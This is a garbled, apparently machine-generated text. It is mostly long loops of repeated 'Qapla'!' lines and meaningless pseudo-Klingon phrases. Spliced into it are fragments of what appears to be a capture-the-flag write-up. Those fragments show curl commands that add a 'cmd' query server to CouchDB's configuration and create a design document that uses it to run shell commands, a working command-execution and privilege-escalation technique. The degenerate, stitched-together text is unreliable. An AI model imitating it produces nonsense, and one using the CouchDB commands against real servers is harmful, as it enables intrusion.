Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
Qapla'!
**Qapla
cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b
chmod 666 /home/homer/etc/local.ini
Subsequent attempts to add the query server succeeded, as demonstrated by the lack of error messages in the response. The successful modification of the local.ini file was confirmed through file comparison:
Subsequent attempts to add the query server succeeded, as demonstrated by the lack of error messages in the response. The successful modification of the local.ini file was confirmed through file comparison:
curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"'
The process continued with the creation of a database and a document, followed by an attempt to execute code via a custom view mapping to the newly added query server:
Translation (Klingon):
Qapvam je jImejDaq 'ej jImejDaq, 'ej vItlhutlhDaq 'e' vItlhutlhDaq, 'ej vItlhutlhDaq 'e' vItlhutlhDaq Daq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhut
curl -X PUT 'http://0xdf:df@localhost:5984/df'
curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}'
curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}'
Summary jup 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlh